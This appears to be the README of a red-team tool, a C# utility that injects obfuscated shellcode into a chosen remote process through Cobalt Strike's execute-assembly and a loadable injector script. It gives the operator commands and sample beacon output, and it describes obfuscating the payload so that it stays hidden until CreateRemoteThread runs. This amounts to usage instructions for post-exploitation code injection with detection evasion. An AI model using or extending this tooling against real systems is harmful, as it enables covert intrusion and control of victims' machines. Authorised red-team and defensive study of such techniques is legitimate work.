C# remote process injection utility for Cobalt Strike. The idea is to perform process injection without spawning Powershell and also use a custom obfuscated shellcode payload.
This utility is designed to use Cobalt Strike execute-assembly functionality to inject shellcode into a remote process. The injected shellcode is automatically obfuscated with a simple inline decoder written in assembly.
When the call to CreateRemoteThread happen the payload is still obfuscated since the decoder is part of the final shellcode.
Within a beacon it can be executed using the following command.
execute-assembly /path/RemoteInject.exe PID eW91cnNoZWxsY29kZQo=
-
Clone the repository into your Cobalt Strike installation folder.
-
Load the injector.cna script into Cobalt Strike scripts manager.
When you have a beacon simply type injector or help injector
beacon> injector 4811 http x86
[+] Generating x86 shellcode for http listener.
[+] Injecting the obfuscated shellcode into process with PID: 4811
[+] Process completed.
Mr.Un1k0d3r RingZer0 Team
MBergeron